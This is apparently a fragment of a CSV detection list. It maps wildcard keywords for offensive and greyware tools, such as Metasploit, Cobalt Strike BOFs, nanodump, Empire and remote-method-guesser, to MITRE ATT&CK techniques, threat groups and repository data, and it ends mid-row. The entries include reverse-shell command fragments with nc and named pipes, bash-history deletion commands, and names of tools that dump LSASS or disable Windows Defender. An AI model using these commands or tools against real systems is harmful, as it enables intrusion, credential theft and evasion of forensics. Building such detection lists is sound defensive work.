+"*restic2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*restore_signature.sh *.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*RestrictedAdmin.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*return-wizard-rce-exim.txt*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*rev_kali_192_168_0_110_1234*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*reveng007/C2_Server*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*reveng007/DarkWidow*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*reveng007/Executable_Files*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*reveng007/ReflectiveNtdll*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*reveng007/SharpGmailC2*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*reverse_shell_minified.js*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*reverse_tcp_x64.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reverse_win_http.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reverseDisableWinDef.cpp*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" +"*ReverseProxy.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*ReverseShell.ps1*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*ReverseShell_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*ReverseSocksProxyHandler.*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" +"*ReverseSocksProxyHandler.py*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" +"*ReversingID/Shellcode-Loader*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" +"*RevertToSelf was successful*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Revoke-Obfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. used for de obfuscating powershell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","7","668","121","2020-02-11T19:40:37Z","2017-07-11T01:20:48Z" +"*RevWinDefKiller.exe*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" +"*RhinoSecurityLabs*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*RhinoSecurityLabs/pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*-Rhost * -Port * -Cmd *cmd /c*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-Jenkins.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*rhosts_walker_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RiccardoAncarani/BOFs*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" +"*RiccardoAncarani/LiquidSnake*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*RiccardoAncarani/TaskShell*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","1","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" +"*rid_hijack.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*ridbrute_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ridrelay*","offensive_tool_keyword","ridrelay","Quick and easy way to get domain usernames while on an internal network.","T1175 - T1553.002 - T1553.003","TA0003 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/skorov/ridrelay","1","0","N/A","N/A","4","375","62","2020-05-20T03:35:32Z","2018-04-14T22:10:01Z" +"*Ripemd-160.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*rkervella/CarbonMonoxide*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*rlwrap -cAr nc -lvnp *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*rlwrap nc -lvnp *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*rm .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*rm /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*rm /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*rm -f *.o dump_vdso test_payload*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*rm -f backpipe* mknod /tmp/backpipe p && nc *","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*rmg bind * jmxrmi --bind-objid *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg bind *127.0.0.1:*--localhost-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg call * --plugin GenericPrint.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg call * --signature * --bound-name plain-server*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg codebase *http* --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg codebase *java.util.HashMap *--bound-name legacy-service*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg enum *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg guess * *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg listen * CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg listen 0.0.0.0 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg objid *[*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg roguejmx *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg scan *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg scan * --ports *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg serial * AnTrinh * --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 